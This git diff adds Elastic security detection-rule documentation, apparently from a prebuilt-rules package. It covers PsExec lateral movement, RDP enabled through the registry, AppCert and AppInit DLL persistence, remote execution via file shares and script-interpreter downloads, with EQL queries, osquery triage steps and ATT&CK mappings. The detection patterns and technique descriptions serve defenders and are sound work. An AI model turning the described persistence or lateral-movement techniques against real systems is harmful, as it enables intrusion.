authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts. + + +### False positive analysis + +- This activity is unlikely to happen legitimately, as programs that exhibit this behavior, such as installers and similar utilities, should be signed. Benign true positives (B-TPs) can be added as exceptions if necessary. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id with maxspan=5s + [process where host.os.type == "windows" and event.type == "end" and + process.code_signature.trusted != true and + not process.executable : ("C:\\Windows\\SoftwareDistribution\\*.exe", "C:\\Windows\\WinSxS\\*.exe") + ] by process.executable + [file where host.os.type == "windows" and event.type == "deletion" and file.extension : ("exe", "scr", "com") and + not process.executable : + ("?:\\Program Files\\*.exe", + "?:\\Program Files (x86)\\*.exe", + "?:\\Windows\\System32\\svchost.exe", + "?:\\Windows\\System32\\drvinst.exe") and + not file.path : ("?:\\Program Files\\*.exe", "?:\\Program Files (x86)\\*.exe") + ] by file.path + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Invalid Code Signature +** ID: T1036.001 +** Reference URL: https://attack.mitre.org/techniques/T1036/001/ +* Technique: +** Name: Indicator Removal +** ID: T1070 +** Reference URL: https://attack.mitre.org/techniques/T1070/ +* Sub-technique: +** Name: File Deletion +** ID: T1070.004 +** Reference URL: https://attack.mitre.org/techniques/T1070/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-psexec-network-connection.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-psexec-network-connection.asciidoc new file mode 100644 index 0000000000..5f7e0e53e1 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-psexec-network-connection.asciidoc @@ -0,0 +1,134 @@ +[[prebuilt-rule-8-10-5-psexec-network-connection]] +=== PsExec Network Connection + +Identifies use of the SysInternals tool PsExec.exe making a network connection. This could be an indication of lateral movement. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Execution +* Tactic: Lateral Movement +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating PsExec Network Connection + +PsExec is a remote administration tool that enables the execution of commands with both regular and SYSTEM privileges on Windows systems. Microsoft develops it as part of the Sysinternals Suite. Although commonly used by administrators, PsExec is frequently used by attackers to enable lateral movement and execute commands as SYSTEM to disable defenses and bypass security protections. + +This rule identifies PsExec execution by looking for the creation of `PsExec.exe`, the default name for the utility, followed by a network connection done by the process. + +#### Possible investigation steps + +- Check if the usage of this tool complies with the organization's administration policy. +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Identify the user account that performed the action and whether it should perform this kind of action. +- Identify the target computer and its role in the IT environment. +- Investigate what commands were run, and assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts. + +### False positive analysis + +- This mechanism can be used legitimately. As long as the analyst did not identify suspicious activity related to the user or involved hosts, and the tool is allowed by the organization's policy, such alerts can be dismissed. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. + - Prioritize cases involving critical servers and users. +- Isolate the involved hosts to prevent further post-compromise behavior. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Review the privileges assigned to the user to ensure that the least privilege principle is being followed. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +sequence by process.entity_id + [process where host.os.type == "windows" and process.name : "PsExec.exe" and event.type == "start" and + + /* This flag suppresses the display of the license dialog and may + indicate that psexec executed for the first time in the machine */ + process.args : "-accepteula" and + + not process.executable : ("?:\\ProgramData\\Docusnap\\Discovery\\discovery\\plugins\\17\\Bin\\psexec.exe", + "?:\\Docusnap 11\\Bin\\psexec.exe", + "?:\\Program Files\\Docusnap X\\Bin\\psexec.exe", + "?:\\Program Files\\Docusnap X\\Tools\\dsDNS.exe") and + not process.parent.executable : "?:\\Program Files (x86)\\Cynet\\Cynet Scanner\\CynetScanner.exe"] + [network where host.os.type == "windows" and process.name : "PsExec.exe"] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: System Services +** ID: T1569 +** Reference URL: https://attack.mitre.org/techniques/T1569/ +* Sub-technique: +** Name: Service Execution +** ID: T1569.002 +** Reference URL: https://attack.mitre.org/techniques/T1569/002/ +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Remote Services +** ID: T1021 +** Reference URL: https://attack.mitre.org/techniques/T1021/ +* Sub-technique: +** Name: SMB/Windows Admin Shares +** ID: T1021.002 +** Reference URL: https://attack.mitre.org/techniques/T1021/002/ +* Technique: +** Name: Lateral Tool Transfer +** ID: T1570 +** Reference URL: https://attack.mitre.org/techniques/T1570/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-rdp-enabled-via-registry.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-rdp-enabled-via-registry.asciidoc new file mode 100644 index 0000000000..66b062e6e4 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-rdp-enabled-via-registry.asciidoc @@ -0,0 +1,128 @@ +[[prebuilt-rule-8-10-5-rdp-enabled-via-registry]] +=== RDP Enabled via Registry + +Identifies registry write modifications to enable Remote Desktop Protocol (RDP) access. This could be indicative of adversary lateral movement preparation. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* winlogbeat-* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Lateral Movement +* Tactic: Defense Evasion +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating RDP Enabled via Registry + +Microsoft Remote Desktop Protocol (RDP) is a proprietary Microsoft protocol that enables remote connections to other computers, typically over TCP port 3389. + +Attackers can use RDP to conduct their actions interactively. Ransomware operators frequently use RDP to access victim servers, often using privileged accounts. + +This rule detects modification of the fDenyTSConnections registry key to the value `0`, which specifies that remote desktop connections are enabled. Attackers can abuse remote registry, use psexec, etc., to enable RDP and move laterally. + +#### Possible investigation steps + +- Identify the user account that performed the action and whether it should perform this kind of action. +- Contact the user to check if they are aware of the operation. +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Check whether it makes sense to enable RDP to this host, given its role in the environment. +- Check if the host is directly exposed to the internet. +- Check whether privileged accounts accessed the host shortly after the modification. +- Review network events within a short timespan of this alert for incoming RDP connection attempts. + +### False positive analysis + +- This mechanism can be used legitimately. Check whether the user should be performing this kind of activity, whether they are aware of it, whether RDP should be open, and whether the action exposes the environment to unnecessary risks. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- If RDP is needed, make sure to secure it using firewall rules: + - Allowlist RDP traffic to specific trusted hosts. + - Restrict RDP logins to authorized non-administrator accounts, where possible. +- Isolate the involved hosts to prevent further post-compromise behavior. +- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +registry where host.os.type == "windows" and + event.type in ("creation", "change") and + registry.path : "HKLM\\SYSTEM\\*ControlSet*\\Control\\Terminal Server\\fDenyTSConnections" and + registry.data.strings : ("0", "0x00000000") and + not process.executable : ("?:\\Windows\\System32\\SystemPropertiesRemote.exe", + "?:\\Windows\\System32\\SystemPropertiesComputerName.exe", + "?:\\Windows\\System32\\SystemPropertiesAdvanced.exe", + "?:\\Windows\\System32\\SystemSettingsAdminFlows.exe", + "?:\\Windows\\WinSxS\\*\\TiWorker.exe", + "?:\\Windows\\system32\\svchost.exe") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Remote Services +** ID: T1021 +** Reference URL: https://attack.mitre.org/techniques/T1021/ +* Sub-technique: +** Name: Remote Desktop Protocol +** ID: T1021.001 +** Reference URL: https://attack.mitre.org/techniques/T1021/001/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-registry-persistence-via-appcert-dll.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-registry-persistence-via-appcert-dll.asciidoc new file mode 100644 index 0000000000..158973b487 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-registry-persistence-via-appcert-dll.asciidoc @@ -0,0 +1,93 @@ +[[prebuilt-rule-8-10-5-registry-persistence-via-appcert-dll]] +=== Registry Persistence via AppCert DLL + +Detects attempts to maintain persistence by creating registry keys using AppCert DLLs. AppCert DLLs are loaded by every process using the common API functions to create processes. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Privilege Escalation +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 105 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +registry where host.os.type == "windows" and +/* uncomment once stable length(bytes_written_string) > 0 and */ + registry.path : ( + "HKLM\\SYSTEM\\*ControlSet*\\Control\\Session Manager\\AppCertDLLs\\*", + "\\REGISTRY\\MACHINE\\SYSTEM\\*ControlSet*\\Control\\Session Manager\\AppCertDLLs\\*" + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Event Triggered Execution +** ID: T1546 +** Reference URL: https://attack.mitre.org/techniques/T1546/ +* Sub-technique: +** Name: AppCert DLLs +** ID: T1546.009 +** Reference URL: https://attack.mitre.org/techniques/T1546/009/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Event Triggered Execution +** ID: T1546 +** Reference URL: https://attack.mitre.org/techniques/T1546/ +* Sub-technique: +** Name: AppCert DLLs +** ID: T1546.009 +** Reference URL: https://attack.mitre.org/techniques/T1546/009/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-registry-persistence-via-appinit-dll.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-registry-persistence-via-appinit-dll.asciidoc new file mode 100644 index 0000000000..7cab395f01 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-registry-persistence-via-appinit-dll.asciidoc @@ -0,0 +1,146 @@ +[[prebuilt-rule-8-10-5-registry-persistence-via-appinit-dll]] +=== Registry Persistence via AppInit DLL + +AppInit DLLs are dynamic-link libraries (DLLs) that are loaded into every process that creates a user interface (loads user32.dll) on Microsoft Windows operating systems. The AppInit DLL mechanism is used to load custom code into user-mode processes, allowing for the customization of the user interface and the behavior of Windows-based applications. Attackers who add those DLLs to the registry locations can execute code with elevated privileges, similar to process injection, and provide a solid and constant persistence on the machine. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Defense Evasion +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Registry Persistence via AppInit DLL + +AppInit DLLs are dynamic-link libraries (DLLs) that are loaded into every process that creates a user interface (loads `user32.dll`) on Microsoft Windows operating systems. The AppInit DLL mechanism is used to load custom code into user-mode processes, allowing for the customization of the user interface and the behavior of Windows-based applications. + +Attackers who add those DLLs to the registry locations can execute code with elevated privileges, similar to process injection, and provide a solid and constant persistence on the machine. + +This rule identifies modifications on the AppInit registry keys. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Review the source process and related DLL file tied to the Windows Registry entry. + - Check whether the DLL is signed, and tied to a authorized program used on your environment. +- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts. +- Retrieve all DLLs under the AppInit registry keys: + - !{osquery{"label":"Osquery - Retrieve AppInit Registry Value","query":"SELECT * FROM registry r where (r.key == 'HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows' or\nr.key == 'HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows') and r.name ==\n'AppInit_DLLs'\n"}} +- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze the process executable and the DLLs using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. + - Examine the host services for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. + +### False positive analysis + +- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +registry where host.os.type == "windows" and + registry.path : ( + "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_Dlls", + "HKLM\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_Dlls", + "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_Dlls", + "\\REGISTRY\\MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_Dlls" + ) and not process.executable : ( + "C:\\Windows\\System32\\msiexec.exe", + "C:\\Windows\\SysWOW64\\msiexec.exe", + "C:\\Program Files\\Commvault\\ContentStore*\\Base\\cvd.exe", + "C:\\Program Files (x86)\\Commvault\\ContentStore*\\Base\\cvd.exe") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Event Triggered Execution +** ID: T1546 +** Reference URL: https://attack.mitre.org/techniques/T1546/ +* Sub-technique: +** Name: AppInit DLLs +** ID: T1546.010 +** Reference URL: https://attack.mitre.org/techniques/T1546/010/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-remote-execution-via-file-shares.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-remote-execution-via-file-shares.asciidoc new file mode 100644 index 0000000000..c0332b8444 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-remote-execution-via-file-shares.asciidoc @@ -0,0 +1,125 @@ +[[prebuilt-rule-8-10-5-remote-execution-via-file-shares]] +=== Remote Execution via File Shares + +Identifies the execution of a file that was created by the virtual system process. This may indicate lateral movement via network file shares. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://blog.menasec.net/2020/08/new-trick-to-detect-lateral-movement.html + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Lateral Movement +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Remote Execution via File Shares + +Adversaries can use network shares to host tooling to support the compromise of other hosts in the environment. These tools can include discovery utilities, credential dumpers, malware, etc. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Review adjacent login events (e.g., 4624) in the alert timeframe to identify the account used to perform this action. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze the process executable using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. + - Examine the host services for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification. + +### False positive analysis + +- This activity can happen legitimately. Consider adding exceptions if it is expected and noisy in your environment. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Review the privileges needed to write to the network share and restrict write access as needed. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +sequence with maxspan=1m + [file where host.os.type == "windows" and event.type in ("creation", "change") and + process.pid == 4 and (file.extension : "exe" or file.Ext.header_bytes : "4d5a*")] by host.id, file.path + [process where host.os.type == "windows" and event.type == "start"] by host.id, process.executable + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Remote Services +** ID: T1021 +** Reference URL: https://attack.mitre.org/techniques/T1021/ +* Sub-technique: +** Name: SMB/Windows Admin Shares +** ID: T1021.002 +** Reference URL: https://attack.mitre.org/techniques/T1021/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-remote-file-download-via-script-interpreter.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-remote-file-download-via-script-interpreter.asciidoc new file mode 100644 index 0000000000..31098653e2 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-remote-file-download-via-script-interpreter.asciidoc @@ -0,0 +1,136 @@ +[[prebuilt-rule-8-10-5-remote-file-download-via-script-interpreter]] +=== Remote File Download via Script Interpreter + +Identifies built-in Windows script interpreters (cscript.exe or wscript.exe) being used to download an executable file from a remote destination. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Command and Control +* Tactic: Execution +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Remote File Download via Script Interpreter + +The Windows Script Host (WSH) is a Windows automation technology, which is ideal for non-interactive scripting needs, such as logon scripting, administrative scripting, and machine automation. + +Attackers commonly use WSH scripts as their initial access method, acting like droppers for second stage payloads, but can also use them to download tools and utilities needed to accomplish their goals. + +This rule looks for DLLs and executables downloaded using `cscript.exe` or `wscript.exe`. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze both the script and the executable involved using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. + - Examine the host services for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification. + +### False positive analysis + +- The usage of these script engines by regular users is unlikely. In the case of authorized benign true positives (B-TPs), exceptions can be added. + 